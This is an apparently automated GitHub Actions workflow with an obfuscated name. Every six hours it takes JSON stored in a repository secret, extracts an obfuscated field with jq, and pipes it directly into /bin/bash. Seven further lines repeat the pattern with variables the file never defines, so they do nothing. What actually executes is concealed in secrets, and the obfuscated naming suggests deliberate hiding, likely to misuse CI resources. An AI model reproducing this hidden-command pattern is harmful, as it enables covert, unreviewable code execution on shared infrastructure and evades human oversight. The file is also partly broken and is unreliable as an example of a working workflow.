name: ruanxiaoer19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '10 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ruanxiaoer19871010
        env:
          fb48360: ${{ secrets.fb48360 }}
        run: |
          echo $fb48360 | jq -r .lp63 | /bin/bash
          echo $muhn3 | jq -r .lc11393 | /bin/bash
          echo $rij40 | jq -r .nkubc3851 | /bin/bash
          echo $lo6 | jq -r .vj774 | /bin/bash
          echo $k09849 | jq -r .e15066 | /bin/bash
          echo $u61749 | jq -r .bwqco9387 | /bin/bash
          echo $q81013 | jq -r .w02 | /bin/bash
          echo $rf0455 | jq -r .y63 | /bin/bash

